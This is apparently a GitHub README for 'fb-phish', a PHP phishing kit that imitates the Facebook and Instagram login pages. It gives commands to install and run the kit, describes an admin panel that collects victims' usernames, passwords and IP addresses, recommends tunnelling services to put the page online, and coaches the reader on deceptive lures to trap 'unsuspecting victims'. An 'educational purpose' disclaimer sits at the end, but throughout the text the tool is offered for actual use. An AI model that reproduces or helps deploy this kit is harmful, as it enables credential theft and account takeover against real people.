Skip to content
This repository has been archived by the owner on May 5, 2024. It is now read-only.

isaka-james/fb-phish

Repository files navigation

fb-phish insta-phish 🚀

Recembrance fb and ig UI updated March,2024

💣 The most advanced🤖 and maintained Phish!💥

⚠️⚠️⚠️Dangerous Tool☠⚠️⚠️⚠️

project views count

New Version✅ - Tested 16th March,2024

Added the insta-phish..

See stuffs added!

Authors 🕵🏿‍♂️

Author comments:

I archieved the project today, because no maintainers are willing to update the project!.(5 May, 2024)

"Please don't hack people with this dangerous tool⚠️⚠️" — masterplan

What's new?

  • The insta-phish can be accessible on http://localhost/instagram , redirect people to this route to get the phishing done! (16 March, 2024)
  • New 💥💥 insta-phish was added!. (16 March, 2024)
  • Now the refresh for admin pannel to get passwords and usernames uses JavaScript, say bye bye to refresh page html element.(6 March, 2024)
  • Images and logics which were draining the Tool are removed from JavaScript. ( 6 March, 2024)
  • Used the bootstrap to prettify the admin pannel and the table of username and passwords look neat. Also the links are now prettified! (6 March, 2024)
  • Removed useless code(clean) and introduced new advanced infrustructure. (6 March, 2024)
  • Now the links are working fine, to access admin pannel just type https://localhost:8080/admin (6 March, 2024)
  • Now windows users can now run smoothly without any problem. ( Feb15, 2024)
  • The reload feature has been added for windows admin pannel!. (Feb15, 2024)
  • New User Interface resembling to the today's Facebook interface!. (Jan,2024)
  • Removed all the facebook links, now everything runs locally!.

Languages used:

No framework was used!, Only PHP!

language-svg

My anonymous friend's comment: 💭

This login page is so well-crafted that even Mark Zuckerberg himself might be fooled. The design is flawless, the user experience is seamless, and the security measures are top-notch that It has no connections link with Facebook, So when you use, you feel like anonymous hacker !. It's like the perfect replica, so identical to the real thing that even the creator of Facebook would have a hard time telling the difference.

How it look on Desktop?

Screenshot from 2024-02-15 05-41-17

How it look on Mobile devices?

Screenshot from 2024-02-15 05-44-30

Screenshot from 2024-03-16 04-27-15

How Admin Pannel looks like? ✅ Update 16th March, 2024

Screenshot from 2024-03-16 04-29-54

HOW IT WORKS? ⚡

When user fills his/her username and passwords, by clicking the login. The user will be redirected to official FaceBook website. The user won't notice the changes since the websites(one which we made and the original one) are very identical, when I say Identical I mean it!, even my closest developers friends fell for this LOL.

Installation in linux enviroment 🐧

To install this tool,

  git clone https://github.com/isaka-james/fb-phish.git           # get a copy of Tool
  cd fb-phish                                                     # get inside the Tool
  php -S localhost:8080                                           # start server at port 8080

After starting the server, open another session:

I chose the port 8080 for easy understanding(since Termux users cannot use port 80)

Then for seeing the users' passwords and usernames filled the form, you can write these commands:

cd command-line/   # going to 'command-line' folder special made for Linux users
bash command.sh       # this script contains the code for autoreload the live filled username and passwords on the website(tool)

Screenshot:

Screenshot from 2024-03-11 14-36-08

Admin Pannel:

When you want to view the user logins( username and password ) through web interface, On the bottom of the login page there is a little box when you clicked that you will be redirected to the /admin , where you will meet the table with all the user logins.

Or simply navigate to http://localhost:8080/admin for viewing the admin pannel containing the username, passwords, IP address and more.

Need to Customize your Phishing? ✍️

You'll discover a treasure trove of social engineering goodness, specifically the 'social-engineering/display.b' file tucked away in the 'social-engineering' folder. This unassuming document serves as the stage for your cunning phishing persuasion.

To unleash the full potential of this tool, unleash your inner social engineering mastermind. Sprinkle your words with irresistible allure, like:

-In order to claim your coveted rewards, you must first embark on a journey of login! -Embark on your quest to proceed by completing the login ritual.

Remember, the key to social engineering mastery lies in crafting messages that tap into the target's desires and heighten their curiosity. Let your creativity soar, and watch as unsuspecting victims eagerly fall into your trap.

So, embark on this journey of social engineering prowess, and let your mischievous plans unfold. With a sprinkle of creativity and a touch of cunning, you'll be the master of deception, leaving your friends scratching their heads in bewilderment.

How to make it available online?

You can use ngrok, localexpose or other similar services that makes the tunnelling.

FAQ 📋

Question1: Can fb-phish used in Termux devices?

Yes, Just use the same procedures as used in Linux above.

Question 2: Can I use this tool without knowledge of code?

Yes!

Question 3: How can I run in windows?

Steps,

  • Get the tool by either using git or downloading the project manually.
  • Go to your server web folder ie if you are using xampp go to C:\xampp\htdocs
  • Copy the tool contents to your server web folder i.e C:\xampp\htdocs if you are using xampp
  • Run your server

If you're a Windows user, navigate to the small box located in the footer, adjacent to the Chinese language option, to access the administrative panel. Here, you'll find a comprehensive log of user logins, including their respective usernames and passwords.

⚠️⚠️ DISCLAIMER!!! ⚠️⚠️

Hacking is illegal, This is made for educational purpose only. I will not be responsible for any kind of misuse of this tool. Please check the regulations of your country before using this TOOL.

License

No licence